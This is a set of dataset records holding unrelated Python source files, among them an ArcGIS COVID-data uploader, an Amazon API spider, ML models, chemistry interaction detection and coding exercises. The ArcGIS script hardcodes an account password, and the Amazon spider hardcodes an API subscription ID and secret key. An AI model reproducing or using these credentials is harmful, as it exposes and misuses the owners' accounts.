request\nfrom urllib.error import URLError\nimport pandas as pd\n\ndef feedRoutine (url, workGDB, itemid, original_sd_file, service_name):\n # Log file\n logging.basicConfig(filename=\"update_covid_data.log\", level=logging.INFO)\n log_format = \"%Y-%m-%d %H:%M:%S\"\n # Create workGDB and default workspace\n print(\"Starting workGDB...\")\n logging.info(\"Starting workGDB... 
{0}\".format(dt.datetime.now().strftime(log_format)))\n arcpy.env.workspace = workGDB\n if arcpy.Exists(arcpy.env.workspace):\n for feat in arcpy.ListFeatureClasses (\"ZIP\"): \n arcpy.management.Delete(feat)\n else:\n arcpy.management.CreateFileGDB(os.path.dirname(workGDB), os.path.basename(workGDB))\n \n # Download and split json file\n print(\"Downloading data...\")\n logging.info(\"Downloading data... {0}\".format(dt.datetime.now().strftime(log_format)))\n temp_dir = tempfile.mkdtemp()\n # convert to JSON from csv --> need to write if statement for future \n df = pd.read_csv (r'covid_data.csv')\n df.to_json(r'covid-data.json')\n # commenting out below bc don't need to fetch from url\n filename = os.path.join(temp_dir, 'latest_data.json')\n # try:\n # response = request.urlretrieve(url, filename)\n # except URLError:\n # logging.exception(\"Failed on: request.urlretrieve(url, filename) {0}\".format(dt.datetime.now().strftime(log_format)))\n # raise Exception(\"{0} not available. Check internet connection or url address\".format(url))\n with open(filename) as json_file:\n data_raw = json.load(json_file)\n data_stations = dict(type=data_raw['type'], features=[])\n data_areas = dict(type=data_raw['type'], features=[])\n for feat in data_raw['features']:\n if feat['geometry']['type'] == 'Point':\n data_stations['features'].append(feat)\n else:\n data_areas['features'].append(feat)\n # Filenames of temp json files\n stations_json_path = os.path.join(temp_dir, 'points.json')\n areas_json_path = os.path.join(temp_dir, 'polygons.json')\n # Save dictionaries into json files\n with open(stations_json_path, 'w') as point_json_file:\n json.dump(data_stations, point_json_file, indent=4)\n with open(areas_json_path, 'w') as poly_json_file:\n json.dump(data_areas, poly_json_file, indent=4)\n # Convert json files to features\n print(\"Creating feature classes...\")\n logging.info(\"Creating feature classes... {0}\".format(dt.datetime.now().strftime(log_format)))\n arcpy.conversion.JSONToFeatures(stations_json_path, 'alert_stations') \n arcpy.conversion.JSONToFeatures(areas_json_path, 'alert_areas')\n # Add 'alert_level ' field\n arcpy.management.AddField('alert_stations', 'alert_level', 'SHORT', field_alias='Alert Level')\n arcpy.management.AddField('alert_areas', 'alert_level', 'SHORT', field_alias='Alert Level')\n # Calculate 'alert_level ' field\n arcpy.management.CalculateField('alert_stations', 'alert_level', \"int(!alert!)\")\n arcpy.management.CalculateField('alert_areas', 'alert_level', \"int(!alert!)\")\n\n # Deployment Logic\n print(\"Deploying...\")\n logging.info(\"Deploying... {0}\".format(dt.datetime.now().strftime(log_format)))\n deployLogic(workGDB, itemid, original_sd_file, service_name)\n\n # Close Log File\n logging.shutdown()\n\n # Return\n print(\"Done!\")\n logging.info(\"Done! 
{0}\".format(dt.datetime.now().strftime(log_format)))\n return True\n\ndef deployLogic(workGDB, itemid, original_sd_file, service_name):\n # Get item from ArcGIS Online\n gis = GIS(url='https://arcgis.com', username='tola_TerrEmpathy', password='ibitola95')\n item = gis.content.get(itemid)\n sd_file_name = os.path.basename(original_sd_file)\n # if sd_file_name != item.related_items(\"Service2Data\")[0].name:\n # raise Exception('Erroneous itemid, service name, or original sd file'.format(itemid))\n # Unpack original_sd_file using 7-zip\n path_7z = fnmatch.filter(os.environ['path'].split(';'), '*7-Zip')\n # path_7z = [r'C:\\Program Files\\7-Zip\\7z.exe', ...]\n temp_dir = tempfile.mkdtemp()\n if len(path_7z):\n exe_7z = os.path.join(path_7z[0], '7z.exe')\n call_unzip = '{0} x {1} -o{2}'.format(exe_7z, original_sd_file, temp_dir)\n else:\n raise Exception('7-Zip could not be found in the PATH environment variable')\n subprocess.call(call_unzip)\n # Replace Live.gdb content\n liveGDB = os.path.join(temp_dir, 'p20', 'test-live-data.gdb')\n shutil.rmtree(liveGDB)\n os.mkdir(liveGDB)\n for root, dirs, files in os.walk(workGDB):\n files = [f for f in files if '.lock' not in f]\n for f in files:\n shutil.copy2(os.path.join(workGDB, f), os.path.join(liveGDB, f))\n # Zip file\n os.chdir(temp_dir)\n updated_sd = os.path.join(temp_dir, sd_file_name)\n call_zip = '{0} a {1} -m1=LZMA'.format(exe_7z, updated_sd)\n subprocess.call(call_zip)\n # Replace file\n manager = arcgis.features.FeatureLayerCollection.fromitem(item).manager\n status = manager.overwrite(updated_sd)\n # Return\n return True\n\nif __name__ == \"__main__\":\n [url, workGDB, itemid, original_sd_file, service_name] = sys.argv[1:]\n feedRoutine (url, workGDB, itemid, original_sd_file, service_name)","sub_path":"update_covid_data.py","file_name":"update_covid_data.py","file_ext":"py","file_size_in_byte":5402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"260860844","text":"from alascrapy.spiders.base_spiders.amazon_API_spider import AmazonAPISpider\n\n\nclass AmazonComAPISpider(AmazonAPISpider):\n source_key = 'com'\n name = 'amazon_api_com'\n start_urls = ['https://www.amazon.com']\n endpoint = 'webservices.amazon.com'\n associate_tag = 'alatestcouk0e-21'\n subscription_id = '0EWA6R5AGNW9AA6JF8R2'\n secret_key = '1RFwtwfJeqi6fTzO/hxmf+J9E8Nfai2rHWSwy6xu'","sub_path":"alascrapy/spiders/amazon_API_com.py","file_name":"amazon_API_com.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"49243313","text":"#!/usr/bin/env python3\nfrom hashlib import md5\nimport sys\n\ndef get_md5(s):\n m = md5()\n m.update(s.encode('utf-8'))\n return m.hexdigest()\n\n\nTEST_FUNCTION = sys.argv[1]\n\n\nFundamentalTypes = [\n # -- bool -- #\n #'bool',\n\n # -- char -- #\n 'char',\n 'unsigned char',\n\n # -- int -- #\n 'short',\n 'short int',\n 'signed short',\n 'signed short int',\n 'unsigned short',\n 'unsigned short int',\n 'int',\n 'signed',\n 'signed int',\n 'unsigned',\n 'unsigned int',\n 'long',\n 'long int',\n 'signed long',\n 'signed long int',\n 'unsigned long',\n 'unsigned long int',\n 'long long',\n 'long long int',\n 'signed long long',\n 'signed long long int',\n 'unsigned long long',\n 'unsigned long long int',\n 'int8_t',\n 'int16_t',\n 'int32_t',\n 'int64_t',\n 'int_fast8_t',\n 'int_fast16_t',\n 'int_fast32_t',\n 'int_fast64_t',\n 'int_least8_t',\n 'int_least16_t',\n 'int_least32_t',\n 
'int_least64_t',\n 'uint8_t',\n 'uint16_t',\n 'uint32_t',\n 'uint64_t',\n 'uint_fast8_t',\n 'uint_fast16_t',\n 'uint_fast32_t',\n 'uint_fast64_t',\n 'uint_least8_t',\n 'uint_least16_t',\n 'uint_least32_t',\n 'uint_least64_t',\n 'size_t',\n\n # -- float/double -- #\n 'float',\n 'double',\n 'long double',\n]\n\nOtherTypes = [\n 'string',\n]\n\nContainerTypes = [\n # -- basic -- #\n 'complex',\n\n # -- sequence -- #\n 'forward_list',\n 'list',\n 'deque',\n #'array',\n 'vector',\n\n # -- associative -- #\n #'set',\n #'map',\n #'unordered_set',\n #'unordered_map',\n]\n\n\nOPENMODE = 'ios::out'\n\nprint(\"\"\"\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \"ioer.hpp\"\n\nusing namespace std;\nusing namespace ioer;\n\nint main(int argc, char** argv){\n\toutput_t STDOUT;\n\toutput_t F1(\"1.txt\", %s);\n\toutput_t F2(\"2.txt\", %s);\n\"\"\"[1:] % (OPENMODE, OPENMODE))\n\nPRINTLIST = []\n\nfor T in FundamentalTypes:\n NAME='_' + get_md5(T)\n code = '\\t{TYPE} {NAME} = {VALUE};'.format(TYPE=T,\n NAME=NAME,\n VALUE='numeric_limits<' + T + '>::max()')\n PRINTLIST.append(NAME)\n print(code)\n\nfor T in OtherTypes:\n NAME='_' + get_md5(T)\n code = '\\t{TYPE} {NAME} = {VALUE};'.format(TYPE=T,\n NAME='_' + get_md5(T),\n VALUE='\"' + T + '\"')\n PRINTLIST.append(NAME)\n print(code)\n\nfor C in ContainerTypes:\n if C == 'array':\n OTHERS = \", 3\"\n else:\n OTHERS = \"\"\n\n if C == 'complex':\n for T in FundamentalTypes:\n if T != 'char' or T != 'unsigned char':\n NAME='_' + get_md5(C+T)\n code = '\\t{CONTAINER}<{TYPE}{OTHERS}> {NAME} = '.format( CONTAINER=C,\n TYPE=T,\n NAME=NAME,\n OTHERS=OTHERS)\n code += '('\n code += '{MIN}, {MAX}' \\\n .format(\n MIN='numeric_limits<{T}>::min()'.format(T=T),\n MAX='numeric_limits<{T}>::max()'.format(T=T),\n )\n code += ');'\n PRINTLIST.append(NAME)\n print(code)\n continue\n for T in FundamentalTypes:\n NAME='_' + get_md5(C+T)\n code = '\\t{CONTAINER}<{TYPE}{OTHERS}> {NAME} = '.format( CONTAINER=C,\n TYPE=T,\n NAME=NAME,\n OTHERS=OTHERS)\n code += '{'\n code += '{MIN}, {MAX}, {MID}' \\\n .format(\n MIN='numeric_limits<{T}>::min()'.format(T=T),\n MAX='numeric_limits<{T}>::max()'.format(T=T),\n MID='(numeric_limits<{T}>::max() + numeric_limits<{T}>::min() ) / 2'.format(T=T),\n )\n code += '};'\n PRINTLIST.append(NAME)\n print(code)\n\n for T in OtherTypes:\n NAME='_' + get_md5(C+T)\n code = '\\t{CONTAINER}<{TYPE}{OTHERS}> {NAME} = '.format( CONTAINER=C,\n TYPE=T,\n NAME=NAME,\n OTHERS=OTHERS)\n code += '{'\n code += '{MIN}, {MAX}, {MID}' \\\n .format(\n MIN='\"numeric_limits<{T}>::min()\"'.format(T=T),\n MAX='\"numeric_limits<{T}>::max()\"'.format(T=T),\n MID='\"(numeric_limits<{T}>::max() + numeric_limits<{T}>::min() ) / 2\"'.format(T=T),\n )\n code += '};'\n PRINTLIST.append(NAME)\n print(code)\n\nprint(\"\"\"\n // {TEST_FUNCTION}\n STDOUT.{TEST_FUNCTION}(\n {PRINTLIST}\n );\n F1.{TEST_FUNCTION}(\n {PRINTLIST}\n );\n F2.{TEST_FUNCTION}(\n {PRINTLIST}\n );\n\"\"\".format(TEST_FUNCTION=TEST_FUNCTION,\n PRINTLIST=',\\n\\t'.join(PRINTLIST) + ',\\n\\t\"abcdefg\"')\n)\n\nprint('}')\n","sub_path":"ioer_test/gentypes.py","file_name":"gentypes.py","file_ext":"py","file_size_in_byte":5415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"456751186","text":"import torch.nn as nn\nimport torch\n\n\nclass View(nn.Module):\n def __init__(self, shape):\n super().__init__()\n self.shape = shape\n\n def forward(self, x):\n 
return x.view(*self.shape)\n\n\nclass PrintShape(nn.Module):\n def forward(self, x):\n print(x.shape)\n return x\n\n\nclass RiVAE(nn.Module):\n def __init__(self, latent_dim, batch_size, img_shape):\n super(RiVAE, self).__init__()\n\n '''\n Output = ((I - K + 2P) / S + 1)\n I - a size of input neuron\n K - kernel size\n P - padding\n S - stride\n '''\n\n # encoder\n self.encoder = nn.Sequential(\n nn.Conv2d(3, 24, kernel_size=3, stride=3, padding=1),\n nn.LeakyReLU(0.2, inplace=True),\n nn.MaxPool2d(2, stride=2),\n nn.Conv2d(24, 12, kernel_size=3, stride=2, padding=1),\n nn.LeakyReLU(0.2, inplace=True),\n nn.MaxPool2d(2, stride=1),\n nn.Flatten(),\n nn.Linear(in_features=6348, out_features=latent_dim << 1),\n nn.Sigmoid(),\n View((-1, 2, latent_dim))\n )\n\n # decoder\n self.decoder = nn.Sequential(\n nn.Linear(in_features=latent_dim, out_features=6348),\n nn.ReLU(inplace=True),\n View((batch_size, 12, 23, 23)),\n nn.ConvTranspose2d(12, 24, kernel_size=3, stride=2),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(24, 12, kernel_size=5, stride=3, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(12, 3, kernel_size=2, stride=2, padding=1),\n nn.Sigmoid()\n )\n\n def reparameterize(self, mu, log_var):\n \"\"\"\n :param mu: mean from the encoder's latent space\n :param log_var: log variance from the encoder's latent space\n \"\"\"\n std = torch.exp(0.5 * log_var) # standard deviation\n eps = torch.randn_like(std) # randn_like as we need the same size\n sample = mu + (eps * std) # sampling as if coming from the input space\n return sample\n\n def forward(self, x):\n # encoding\n x = self.encoder(x)\n\n # get `mu` and `log_var`\n mu = x[:, 0, :]\n log_var = x[:, 1, :]\n\n # get the latent vector through re-parameterization\n z = self.reparameterize(mu, log_var)\n\n # decoding\n reconstruction = self.decoder(z)\n return reconstruction, mu, log_var\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"304912305","text":"# This file is part of BINANA, released under the Apache 2.0 License. See\n# LICENSE.md or go to https://opensource.org/licenses/Apache-2.0 for full\n# details. Copyright 2020 Jacob D. 
Durrant.\n\nfrom binana._utils.shim import _set_default\nfrom binana.interactions.default_params import CATION_PI_DIST_CUTOFF, PI_PADDING_DIST\nimport binana\nfrom binana._utils.utils import hashtable_entry_add_one\nfrom binana._structure.mol import Mol\nfrom binana._utils._math_functions import project_point_onto_plane\n\n\ndef _detect_pi_cat(\n mol_with_aromatic,\n mol_with_pos_charge,\n cutoff,\n pi_padding,\n cat_pi,\n pdb_pi_cat,\n cat_pi_labels,\n name_of_charged=None,\n):\n name_of_charged = _set_default(name_of_charged, \"RECEPTOR\")\n\n for aromatic in mol_with_aromatic.aromatic_rings:\n for charged in mol_with_pos_charge.charges:\n # so only consider positive charges, because no pi-anion interaction\n if (\n charged.positive == True\n and charged.coordinates.dist_to(aromatic.center) < cutoff\n ):\n # distance cutoff based on \"Cation-pi interactions in\n # structural biology.\" project the charged onto the\n # plane of the aromatic\n charge_projected = project_point_onto_plane(\n charged.coordinates, aromatic.plane_coeff\n )\n\n if (\n charge_projected.dist_to(aromatic.center)\n < aromatic.radius + pi_padding\n ):\n structure = mol_with_aromatic.all_atoms[\n aromatic.indices[0]\n ].structure\n if structure == \"\":\n # since it could be interacting with a\n # cofactor or something\n structure = \"OTHER\"\n\n key = \"PI-CATION_\" + name_of_charged + \"-CHARGED_\" + structure\n\n for index in aromatic.indices:\n pdb_pi_cat.add_new_atom(\n mol_with_aromatic.all_atoms[index].copy_of()\n )\n for index in charged.indices:\n pdb_pi_cat.add_new_atom(\n mol_with_pos_charge.all_atoms[index].copy_of()\n )\n\n hashtable_entry_add_one(cat_pi, key)\n\n charged_mol_lbls = (\n \"[\"\n + \" / \".join(\n [\n mol_with_pos_charge.all_atoms[index].string_id()\n for index in charged.indices\n ]\n )\n + \"]\"\n )\n\n aromatic_mol_lbls = (\n \"[\"\n + \" / \".join(\n [\n mol_with_aromatic.all_atoms[index].string_id()\n for index in aromatic.indices\n ]\n )\n + \"]\"\n )\n\n if name_of_charged == \"LIGAND\":\n cat_pi_labels.append(\n (\n charged_mol_lbls,\n aromatic_mol_lbls,\n )\n )\n else:\n cat_pi_labels.append(\n (\n aromatic_mol_lbls,\n charged_mol_lbls,\n )\n )\n\n return cat_pi, pdb_pi_cat, cat_pi_labels\n\n\n# Be sure to update the corresponding function in\n# binana.interactions.__init__.py as well!\n\n\ndef get_cation_pi(ligand, receptor, cutoff=None, pi_padding=None):\n \"\"\"Identifies and counts the number of pi-cation interactions between the\n protein and ligand. Output is formatted like this::\n\n {\n 'counts': {\n 'PI-CATION_LIGAND-CHARGED_BETA': 2,\n 'PI-CATION_LIGAND-CHARGED_OTHER': 2,\n 'PI-CATION_RECEPTOR-CHARGED_OTHER': 1\n },\n 'labels': [\n ('[A:CHT(1):N1(2) / A:CHT(1):C5(1) / A:CHT(1):C6(3) / A:CHT(1):C6(4) / A:CHT(1):C7(9)]', '[A:TRP(43):CG(28) / A:TRP(43):CD1(29) / A:TRP(43):NE1(31) / A:TRP(43):CE2(32) / A:TRP(43):CD2(30)]'),\n ('[A:CHT(1):N1(2) / A:CHT(1):C5(1) / A:CHT(1):C6(3) / A:CHT(1):C6(4) / A:CHT(1):C7(9)]', '[A:TRP(43):CE2(32) / A:TRP(43):CD2(30) / A:TRP(43):CE3(33) / A:TRP(43):CZ3(35) / A:TRP(43):CH2(36) / A:TRP(43):CZ2(34)]')\n ],\n 'mol': \n }\n\n Args:\n ligand (binana._structure.mol.Mol): The ligand molecule to analyze.\n receptor (binana._structure.mol.Mol): The receptor molecule to analyze.\n cutoff (float, optional): The distance cutoff. Defaults to\n CATION_PI_DIST_CUTOFF.\n pi_padding (float, optional): The amount by which the radius of each pi\n ring should be artificially expanded, to be sure to catch the\n interactions. 
Defaults to PI_PADDING_DIST.\n\n    Returns:\n        dict: Contains the atom tallies (\"counts\"), the\n        binana._structure.mol.Mol object with the participating atoms (\"mol\"),\n        and the labels to use in the log file (\"labels\").\n    \"\"\"\n\n    cutoff = _set_default(cutoff, CATION_PI_DIST_CUTOFF)\n    pi_padding = _set_default(pi_padding, PI_PADDING_DIST)\n\n    cat_pi = {}\n    pdb_pi_cat = Mol()\n    cat_pi_labels = []\n\n    cat_pi, pdb_pi_cat, cat_pi_labels = _detect_pi_cat(\n        receptor,\n        ligand,\n        cutoff,\n        pi_padding,\n        cat_pi,\n        pdb_pi_cat,\n        cat_pi_labels,\n        \"LIGAND\",\n    )\n    cat_pi, pdb_pi_cat, cat_pi_labels = _detect_pi_cat(\n        ligand,\n        receptor,\n        cutoff,\n        pi_padding,\n        cat_pi,\n        pdb_pi_cat,\n        cat_pi_labels,\n        \"RECEPTOR\",\n    )\n\n    return {\n        \"counts\": cat_pi,\n        \"mol\": pdb_pi_cat,\n        \"labels\": cat_pi_labels,\n    }\n","sub_path":"vscreenml_v2/binana/interactions/_cat_pi.py","file_name":"_cat_pi.py","file_ext":"py","file_size_in_byte":6251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"510778356","text":"import alfred3 as al\n\nimport alfred3_interact as ali\n\nexp = al.Experiment()\n\nexp.admin += ali.MatchMakerMonitoring(\"plugins.mm\", name=\"monitor\")\nexp.admin += ali.MatchMakerActivation(\"plugins.mm\", name=\"activate\")\n\n\n@exp.setup\ndef setup(exp):\n    spec = ali.IndividualSpec(5, name=\"test\")\n    exp.plugins.mm = ali.MatchMaker(spec, exp=exp)\n\n\nexp += al.Page(title=\"Page 1\", name=\"p1\")\n","sub_path":"tests/res/script-admin.py","file_name":"script-admin.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"370689563","text":"# Positional function argument with multiple parameters\r\n# Additionally order of parameters matters\r\n\r\ndef candy(name_1,name_2):\r\n\tprint(\"\\nSo you like \" + name_1.title())\r\n\tprint(\"Additionally you like \" + name_2.title())\r\n\t\r\ncandy('peanut m&m\\'s','trolli')\r\ncandy('reese\\'s','chocolate')\r\n\r\n# Can tell python which one's which as well \r\n\r\ncandy(name_2 = 'peanut m&m\\'s', name_1 = 'trolli')\r\n\r\n# Can set a default value \r\n\r\ndef gatorade(color, color_2 = 'blue'):\r\n\tprint(\"\\nSo you like \" + color.title() + \" gatorade\")\r\n\tprint(\"Additionally you like \" + color_2.title() + \" gatorade\")\r\n\r\ngatorade('yellow')\r\ngatorade('red','yellow')\r\n","sub_path":"chapter_8/candy.py","file_name":"candy.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"351222985","text":"import copy\nimport random\nfrom discord import Member\nfrom discord.abc import GuildChannel, PrivateChannel\nimport discord\nfrom helpers.SecretSantaParticipant import SecretSantaParticipant\n\nclass SecretSantaHelpers():\n\n    def isListOfParticipants(self, usrlist: list):\n        for usr in usrlist:\n            if(not isinstance(usr, SecretSantaParticipant)):\n                return False\n        return True\n\n    def user_is_participant(self, usrid: discord.User.id, usrlist: list):\n        \"\"\"Takes a discord user ID string and returns whether\n        a user with that ID is in usrlist\"\"\"\n        for person in usrlist:\n            if int(person.idstr) == usrid:\n                return True\n        return False\n\n    def get_participant_object(self, usrid: int, usrlist: list, id_is_partner=False):\n        \"\"\"takes a discord user ID string and list of\n        participant objects, and returns the first\n        participant object with matching id.\n\n        Parameters:\n        usrid (int): the ID of the user you're looking for\n        
usrlist (list): the list the user resides in\n id_is_partner (bool): if True, this function will find the SecretSantaParticipant in usrlist with the usrid as its partner\n \"\"\"\n for (index, person) in enumerate(usrlist):\n if(id_is_partner):\n if(person.partnerid != \"\"):\n if(int(person.partnerid) == usrid):\n return (index, person)\n else:\n if(int(person.idstr) == usrid):\n return (index, person)\n return (-1, None)\n\n def propose_partner_list(self, usrlist: list):\n \"\"\"Generate a proposed partner list\"\"\"\n usr_list_copy = copy.deepcopy(usrlist)\n partners = copy.deepcopy(usrlist)\n ## propose partner list\n for user in usr_list_copy:\n candidates = partners\n partner = candidates[random.randint(0, len(candidates) - 1)]\n while(partner.idstr == user.idstr):\n partner = candidates[random.randint(0, len(candidates) - 1)]\n if((len(candidates) == 1) & (candidates[0].idstr == user.idstr)):\n break # no choice but to pick yourself (this will be declared invalid later)\n #remove user's partner from list of possible partners\n partners.remove(partner)\n #save the partner id to the participant's class instance\n user.partnerid = partner.idstr\n return usr_list_copy\n\n ## everybody has a partner, nobody's partnered with themselves\n def partners_are_valid(self, usrlist: list):\n \"\"\"Make sure that everybody has a partner\n and nobody is partnered with themselves\"\"\"\n if(not usrlist):\n return False\n result = True\n for user in usrlist:\n result = result & (user.partnerid != '') & (user.partnerid != user.idstr)\n return result\n\n ## checks if the user list changed during a pause\n def usr_list_changed_during_pause(self, usrlist: list, usr_left: bool):\n \"\"\"checks if the user list changed during a pause\"\"\"\n if(usr_left):# there's probably a better boolean logic way but this is easy\n usr_left = False # acknowledge\n return True\n\n has_changed = True\n for user in usrlist:\n has_match = (not (str(user.partnerid) == \"\"))\n has_changed = has_changed & has_match # figures out if all users have a match\n has_changed = has_changed & (not usr_left)\n return (not has_changed) ## if not all users have a match\n\n def channelIsPrivate(self, channel):\n return isinstance(channel, PrivateChannel)\n\n def channel_is_guild(self, channel):\n return isinstance(channel, GuildChannel)\n\n def member_is_mod(self, person: discord.Member, mod_list: list):\n \"\"\"Checks that a given member is in the mod list\n @param person the Member in question\"\"\"\n if(isinstance(person, Member)):\n person_roles = person.roles\n person_roles_ids = []\n for person_role in person_roles:\n person_roles_ids.append(person_role.id)\n lst3 = [value for value in person_roles_ids if value in mod_list]\n if(lst3):\n return True\n return False\n\n def is_role_in_server(self, p_role: str, server_role_hierarchy: list):\n if(isinstance(p_role, str)):\n for server_role in server_role_hierarchy:\n if((str(server_role) == p_role) or (str(server_role.mention) == p_role)):\n return server_role\n return False\n","sub_path":"helpers/SecretSantaHelpers.py","file_name":"SecretSantaHelpers.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"98822352","text":"from utils import bet_unet\nfrom model import unet\nfrom tqdm import tqdm\nimport nibabel as nib\n\nimport os\nimport time\nimport argparse\n\n\ndef detect_file(filename, model, unet):\n data = nib.load(filename)\n mask = nib.load(filename)\n mask_roi = 
nib.load(filename)\n\n    width, height, frame_num = data.shape\n    matrix = data.get_data()\n    unet_matrix = bet_unet(matrix, unet, threshold=0.2)\n\n    start = time.time()\n    for i in tqdm(range(frame_num), desc='Detect in {}'.format(os.path.basename(filename))):\n        bet = unet_matrix[:, :, i]\n        mask.get_data()[:, :, i] = bet\n        mask_roi.get_data()[:, :, i] = bet\n    end = time.time()\n\n    print('Using time {}s'.format(end - start))\n    return mask, mask_roi\n\n\nif __name__ == '__main__':\n    import config\n    data_root = config.data_root\n    model_path = config.model_path\n    result_path = config.result_path\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-i', '--input', help='input path')\n    parser.add_argument('-o', '--output', help='output path')\n    args = parser.parse_args()\n\n    data_filename = args.input\n    data_path = os.path.join(data_root, data_filename)\n\n    result_filename = args.output if args.output else '{}_detect_by_unet.nii'.format(\n        data_filename.split('/')[-1].split('.')[-2])\n\n    result_path = os.path.join(result_path, result_filename)\n\n    unet_path = os.path.join(model_path, 'unet_pm25_yuzq.hdf5')\n    bet_net = unet(pretrained_weights=unet_path)\n\n    mask, mask_roi = detect_file(data_path, None, bet_net)\n\n    nib.save(mask, result_path)\n    nib.save(mask_roi, './mask/roi_by_unet.nii')\n","sub_path":"detect_by_unet.py","file_name":"detect_by_unet.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"355988341","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('news', '0017_auto_20160508_1821'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='music',\n            name='name',\n            field=models.CharField(default=1, max_length=256, verbose_name='\\u6b4c\\u66f2\\u540d\\u79f0'),\n            preserve_default=False,\n        ),\n        migrations.AddField(\n            model_name='pic',\n            name='name',\n            field=models.CharField(default=1, max_length=256, verbose_name='\\u56fe\\u7247\\u540d\\u79f0'),\n            preserve_default=False,\n        ),\n    ]\n","sub_path":"news/migrations/0018_auto_20160508_1831.py","file_name":"0018_auto_20160508_1831.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"75035989","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# Define the input data\nX = np.array([ # 4 rows, 3 columns\n    [1, 3, 3],\n    [1, 4, 3],\n    [1, 1, 1],\n    [1, 2, 1]\n])\n\n# Define the labels\nT = np.array([\n    [1], # 4 rows, 1 column\n    [1],\n    [-1],\n    [-1]\n])\n\n# Initialize the weights\nW = np.random.random([3, 1]) # generate a 3x1 array of random weights\n\n# Set the learning rate\nlr = 0.1\n\n# Network output\nY = 0\n\n\ndef train():\n    \"\"\"Update the weights\"\"\"\n    global X, Y, W, T, lr # use these as globals\n    Y = np.sign(np.dot(X, W)) # compute predictions for all four samples at once\n    E = T - Y # error between the four labels and the predictions, E is (4,1)\n    delta_W = lr * (X.T.dot(E) / X.shape[0]) # compute the weight change\n    W = W + delta_W # update the weights\n\n\n# Train the model\nfor i in range(100):\n    train() # update the weights\n    print(\"epoch:\", i + 1) # current epoch\n    print(\"weights:\", W) # current weights\n    Y = np.sign(np.dot(X, W)) # compute the current output\n    if (Y == T).all(): # all() is True only when every value of Y equals the corresponding value of T\n        print(\"Finished\")\n        break # exit the loop\n\n# Plot the final result\n# positive-sample x/y coordinates\nx1 = [3, 4]\ny1 = [3, 3]\n\n# negative-sample x/y coordinates\nx2 = [1, 2]\ny2 = [1, 1]\n\n# Decision boundary\n# w0 + w1*x1 + w2*x2 = 0 defines the decision boundary\n# slope and intercept of the decision boundary\nk = -W[1] / W[2]\nd = -W[0] / W[2]\n# pick two x values\nxdata = (0, 5)\n# draw the decision boundary through them as a red line\nplt.plot(xdata, xdata * k + d, 'r')\n# plot the positive samples in blue\nplt.scatter(x1, y1, c='b')\n# plot the negative samples as yellow dots\nplt.scatter(x2, y2, 
c='y')\nplt.show()\n","sub_path":"zheng_01_单层感知器.py","file_name":"zheng_01_单层感知器.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"247026592","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nGiven a 32-bit signed integer, reverse digits of an integer.\n\nExample 1:\n\nInput: 123\nOutput: 321\nExample 2:\n\nInput: -123\nOutput: -321\nExample 3:\n\nInput: 120\nOutput: 21\nNote:\nAssume we are dealing with an environment which could only store integers within the 32-bit signed integer range: [-2^31, 2^31 - 1]. For the purpose of this problem, assume that your function returns 0 when the reversed integer overflows.\n\nSource: LeetCode (LeetCode-CN)\nLink: https://leetcode-cn.com/problems/reverse-integer\nCopyright belongs to LeetCode. Please contact LeetCode for authorization before commercial reprinting; for non-commercial reprints please cite the source.\n\"\"\"\n\n\nclass Solution:\n    def reverse(self, x: int) -> int:\n        sign = False\n        if x < 0:\n            sign = True\n\n        x = abs(x)\n\n        x = str(x)\n\n        chars = []\n        for c in x:\n            chars.append(c)\n\n        chars.reverse()\n\n        y = ''.join(chars)\n\n        y = int(y)\n\n        if sign:\n            if y > 2 ** 31:\n                y = 0\n            else:\n                y = -y\n        else:\n            if y > 2 ** 31 - 1:\n                y = 0\n            else:\n                y = y\n        return y\n\n    def reverse_2(self, x):\n        rev = 0\n\n        if x > 0:\n            flag = True\n        elif x < 0:\n            flag = False\n        else:\n            return rev\n\n        while x != 0:\n            x = abs(x)\n            pop = x % 10\n            x = x // 10\n\n            if flag:\n                if rev > 2**31 // 10 or (rev == 2**31 // 10 and pop > 7):\n                    return 0\n            else:\n                if rev > 2**31 // 10 or (rev == 2**31 // 10 and pop > 8):\n                    return 0\n            rev = rev * 10 + pop\n\n        if flag:\n            return rev\n        return -rev\n\n\nif __name__ == '__main__':\n    s = Solution()\n    ret = s.reverse_2(-765761230)\n    print(ret)\n","sub_path":"leetcode/02_reverse_integer.py","file_name":"02_reverse_integer.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"536389311","text":"\"\"\"\nEach turn, we choose the two heaviest rocks and smash them together. \nSuppose the stones have weights x and y with x <= y. The result of this smash is:\n\nIf x == y, both stones are totally 